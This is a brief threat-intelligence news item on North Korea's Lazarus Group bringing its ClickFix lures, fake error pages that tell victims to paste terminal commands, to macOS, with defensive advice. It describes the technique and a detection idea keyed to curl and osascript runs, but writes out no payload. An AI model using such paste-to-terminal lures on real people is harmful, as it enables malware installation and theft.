Lazarus Group Pivots ClickFix Social Engineering to macOS Targets

North Korea’s Lazarus Group has extended its ClickFix campaign to macOS, expanding a technique previously aimed at Windows users. ClickFix relies on social engineering: victims are lured to a fake error or verification page and instructed to paste and run a command in their terminal, bypassing the usual code-signing and Gatekeeper prompts that would otherwise deter execution of unsigned binaries.

The shift matters because macOS has long been treated as a softer target for user-driven execution attacks, and Lazarus has a track record of financially motivated intrusions against crypto firms, developers, and fintech personnel — demographics overrepresented on Apple hardware. Operators who assumed macOS endpoints were out of scope for this class of lure need to revisit detection coverage for terminal-driven payload staging and clipboard-to-shell execution patterns.

Defenders should treat any workflow that instructs a user to paste shell commands as inherently hostile, regardless of the rendering browser or OS. EDR rules keyed to curl/osascript execution from interactive shells, combined with user training that flags copy-paste-to-terminal prompts, are the most direct countermeasures.